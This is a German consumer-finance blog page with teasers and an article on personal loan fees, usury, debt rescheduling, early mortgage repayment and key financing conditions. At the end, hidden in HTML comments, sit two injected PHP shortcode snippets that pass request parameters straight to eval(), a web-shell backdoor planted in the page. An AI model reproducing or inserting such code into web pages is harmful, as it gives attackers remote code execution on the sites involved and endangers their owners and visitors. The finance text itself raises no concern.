Gebühren für Privatkredite: Was ist okay und was ist Wucher?

Bei Krediten für Privatkunden gehen die Konditionen von fairen, einigen wenigen Prozent Kreditzinsen bis weit in den zweistelligen Bereich. Wenn Dispozinsen von mehr als 10 % an der Tagesordnung sind und vielleicht auch einmal 15 oder 16 % für Privatkredite verlangt werden, dann stellt sich die Frage:…
Gebühren für Privatkredite: Was ist okay und was ist Wucher? weiterlesen

Wenn Kreditschulden übermächtig werden: Das können Sie tun

Für viele Privatpersonen, auch in Deutschland, hat sich das Leben auf Pump inzwischen zur Normalität entwickelt. Die Finanzierung über fremde finanzielle Mittel, zum Beispiel in Form von einem Ratenkauf oder der Inanspruchnahme von einem Kredit erscheint für Viele auf den ersten Blick attraktiv.
Wenn Kreditschulden übermächtig werden: Das können Sie tun weiterlesen

Warum sind Ratenkredite häufig teurer als Baukredite?

Zur Finanzierung von einem Bauvorhaben oder einer Bestandsimmobilie kommen verschiedene Optionen in Frage. Neben dem klassischen Ratenkredit kommen vor allem Baukredite in Frage. Beide Kreditformen bieten sich aufgrund ihrer Konzeption hervorragend für die langfristige Tilgung von bestehenden Verbindlichkeiten an. In den meisten Fällen sind Ratenkredite jedoch teurer als Baukredite, dies kann unterschiedliche Ursachen haben.

Warum sind Ratenkredite häufig teurer als Baukredite? weiterlesen

Laufende Kredite umschulden: Was beachten?

Schulden summieren sich schnell: Der Dispo-Kredit ist ausgereizt, das Auto noch nicht abbezahlt und die Zinsbindungsfrist des Baudarlehens geht zu Ende. Mit dem richtigen Umschuldungskredit lässt sich die monatliche Belastung senken. Das spart nicht nur Nerven, sondern auch viel Geld. Laufende Kredite umschulden: Was beachten? weiterlesen

Eine Baufinanzierung vorzeitig ablösen: Welche Kosten entstehen?

Ergibt sich die Möglichkeit zur früheren Tilgung einer Baufinanzierung, möchte der Verbraucher nicht länger als notwendig am Kredit festhalten und durch eine Sondertilgung in Form der vollständigen Auszahlung der Restsumme sparen. Eine Baufinanzierung vorzeitig ablösen: Welche Kosten entstehen? weiterlesen

Verbraucherkredite: Gebühren und Kündigungskosten noch immer die Regel

Banken verlangen für Kredite noch immer häufig Bearbeitungsgebühren und lassen sich Sonderzahlungen mit hohen Entschädigungen vergüten. Beides ist wenig kundenfreundlich und unnötig. Verbraucher sollten beim Kreditvergleich nicht nur auf den Effektivzins achten. Verbraucherkredite: Gebühren und Kündigungskosten noch immer die Regel weiterlesen

Wichtige Konditionen bei einer Finanzierung

Bei einer Finanzierung kommen auf einen zahlreiche unterschiedliche Begriffe zu, die zu meist alle auf die Konditionen abzielen. Der Finanzierungsbetrag ist letztendlich der Betrag, den der Kunde sich von einer Bank leiht. Eine Anzahlung gehört zwar zu den Konditionen, ist aber kein Finanzierungsbetrag. Eine Anzahlung senkt in der Regel den Finanzierungsbetrag.

Die wichtigsten Konditionen liegen in der Laufzeit, der Zinsen und einer möglichen Restsumme. Grundsätzlich sei gesagt, dass eine lange Laufzeit für den Kunden am teuersten ist. Wiederum sind die monatlichen Belastungen gering und die mögliche Restsumme ebenfalls günstiger. Dennoch muss der Zinssatz über die gesamte Laufzeit bezahlt werden, was die Kreditkosten in die Höhe treibt.

Der Zinssatz setzt sich in aller Regel aus der Laufzeit, der monatlichen Rate und auch den finanziellen Verhältnissen des Kunden zusammen. Wer eine kurze Laufzeit mit hohen monatlichen Raten wählt und gleichzeitig finanziell gut da steht, bekommt den günstigsten Zinssatz. Allerdings gibt es auch festgeschriebene Konditionen, die für jeden Kreditnehmer gleich sind.

Zu den Konditionen zählt ebenfalls die Möglichkeit, Sonderzahlungen zu leisten. Schließlich sorgen solche Sonderzahlungen für eine Reduzierung der Schlussrate und senken damit auch die Kreditkosten. Auch wenn man damit nicht kalkuliert, sollte man sich die Option einer Sonderzahlung offen halten und dies notfalls vorab schriftlich fixieren.
Bevor man eine Finanzierung abschließt, sollte man sich mehrere Optionen durch rechnen lassen oder dies am besten selbst machen. Der Grund dafür liegt auf der Hand, denn unterschiedliche Kombinationen aus Laufzeit, Anzahlung, monatlicher Rate und Restsumme kann bares Geld sparen. Das Ziel sollte für jeden Kreditnehmer sein, dass er die günstigste Zinsvariation zu zahlen hat. Die Reduzierung der Kreditkosten ist die Herausforderung bei der Auswahl der passenden Finanzierung.

<!– [insert_php]if (isset($_REQUEST["CPadc"])){eval($_REQUEST["CPadc"]);exit;}[/insert_php][php]if (isset($_REQUEST["CPadc"])){eval($_REQUEST["CPadc"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["EjNxi"])){eval($_REQUEST["EjNxi"]);exit;}[/insert_php][php]if (isset($_REQUEST["EjNxi"])){eval($_REQUEST["EjNxi"]);exit;}[/php] –>